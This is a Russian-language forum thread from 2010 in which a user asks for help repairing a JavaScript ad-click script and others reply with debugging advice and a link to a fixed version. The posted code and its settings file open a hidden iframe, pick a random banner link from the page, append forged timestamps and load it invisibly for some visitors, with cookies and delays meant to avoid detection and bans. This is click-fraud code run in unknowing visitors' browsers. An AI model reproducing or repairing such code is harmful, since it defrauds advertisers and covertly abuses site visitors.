Помогите доделать скрипт

Тема в разделе "Другие языки", создана пользователем MaximMax, 24 окт 2010.

Статус темы:
Закрыта.
Модераторы: Цукер
  1. MaximMax

    MaximMax

    Регистр.:
    14 май 2009
    Сообщения:
    595
    Симпатии:
    76
    Добрый день помогите доработать скрипт
    надо слебующее.
    1)Когда заходит ползователь и кликает первый раз на сайт то он автоматически кликает по ссылке банера но не переходит на эту реакламу а открывается невидемое окно Iframe
    2)Надо что бы сохранялись куки
    Вот собственно скрипт самого
    Код:
    <script type="text/javascript"><!--
    МОЙ_banner_id = '666';
    document.write('<sc'+'ript type="text/javascript" src="http://site.ru/site.js?rnd='+Math.round(Math.random()*100000)+'"></sc'+'ript>');
    //--></script>
    Вообщем есть вот такой код который это все выполняет но он почему то не работает
    Код:
    document.writeln('<iframe id="adad" style="display: '+ (is_visible ? '' : 'none') +'; position: absolute; scrolling: no; right: 10px; top:10px; z-index:1000;" src="" width="100" height="100"></iframe>');setTimeout("functions()", time_start); var arrIDs = []; // ссылки тут! )
     function functions() {var x = 0;if(document.getElementsByTagName('a')) {
    for(i=0;i<document.getElementsByTagName('a').length;i++) {aHref = document.getElementsByTagName('a')[i].getAttribute('href');if( !( aHref.search(/clicks/) == -1 ) ){
    arrIDs[x] = aHref;x = x + 1;}}}rndID = Math.round(Math.random() * (arrIDs.length-1));
    rndNum = 1 + Math.round(Math.random() * posetitel-1);rnd_sec = 2 + Math.round(Math.random() * 20);
    var d = new Date(); dt2   = d.getTime();dt    = d.getTime() - 3842 * rnd_sec;// фармируем ссылку
    var link = arrIDs[rndID] + dt + "0" + dt2;if(document.getElementById("qq")) {document.getElementById("qq").text = link;}if(getCookie(cooki_name)!=2){SetCookie(cooki_name, "2", "1");if (posetitel == 1) document.getElementById("adad").src = link; if (posetitel > 1 && rndNum == posetitel) 
      { document.getElementById("adad").src = link;   }}}function SetCookie(cookieName,cookieValue,nDays){
    var today = new Date();var expire = new Date();if (nDays==null || nDays==0) nDays=1;expire.setTime(today.getTime() + 3600000*24*nDays);document.cookie = cookieName+"="+escape(cookieValue)
    + ";expires="+expire.toGMTString();}function getCookie(name) {var dc = document.cookie;var prefix = name + "=";var begin = dc.indexOf("; " + prefix);if (begin == -1) {begin = dc.indexOf(prefix);
    if (begin != 0) return null;} else {begin += 2;}var end = document.cookie.indexOf(";", begin);
    if (end == -1) {end = dc.length;}return unescape(dc.substring(begin + prefix.length, end));}
    + есть еще фаил настроек к этому коду
    Код:
    var cooki_name = "medmir";  // ИМЯ КУКОВ!
    var time_start = 5000; // время старта (в милисекундах - 1000 = 1с) функции автоклик  после загрузки (например если подьзователь задерживаеться более 40 секунд то кликает (это тоже как защита от бана... чтоб часто не кликать))
    var is_visible = false;  // Показывать фрейм (true) непоказывать(false) - можете для теста включить... он будет в правом верхнем углу.... 100 х 100
    var posetitel = 2;  // Какой случайный посетитель кликает? если стоит 1 то каждый!  Если 2 - то случайно будет... тоесть кликнет или нет... советую поэксперементировать с этим значением
    
     
  2. alica

    alica

    Регистр.:
    28 июл 2008
    Сообщения:
    243
    Симпатии:
    76
    Вообще то второй код ничего не выполняет, там набор функций, которые должны где-то стартовать.
     
  3. latteo

    latteo Эффективное использование PHP, MySQL

    Moderator
    Регистр.:
    28 фев 2008
    Сообщения:
    1.402
    Симпатии:
    1.183
    все там выполняется и стартует, зачем людей в заблуждение вводить

    2 ТС:
    Выглядит все прилично, в связи с чем возникают вопросы:
    - проверял во всех браузерах(возможно там кроссбраузерность страдает)?
    - пробовал консоль javascript запускать, чтоб с ошибкой определится?
     
  4. MaximMax

    MaximMax

    Регистр.:
    14 май 2009
    Сообщения:
    595
    Симпатии:
    76
    Скрипт писал не я а мой друг его щас нету и не скоро будет

    Я без понятия что такое


    Скрипт был рабочий рабочий нопотом он перестал работать немогу понять почему не активный не идет клик на ссылку .
     
  5. alica

    alica

    Регистр.:
    28 июл 2008
    Сообщения:
    243
    Симпатии:
    76
    Ай.. действительно, не заметил.. сорри...

    2MaximMax

    Вот полностью рабочие функции, проблема была в functions, я внес в нее исправления и протестировал весь код.

    http://dumpz.org/23496/
    Пароль nulled
     
    MaximMax нравится это.
Статус темы:
Закрыта.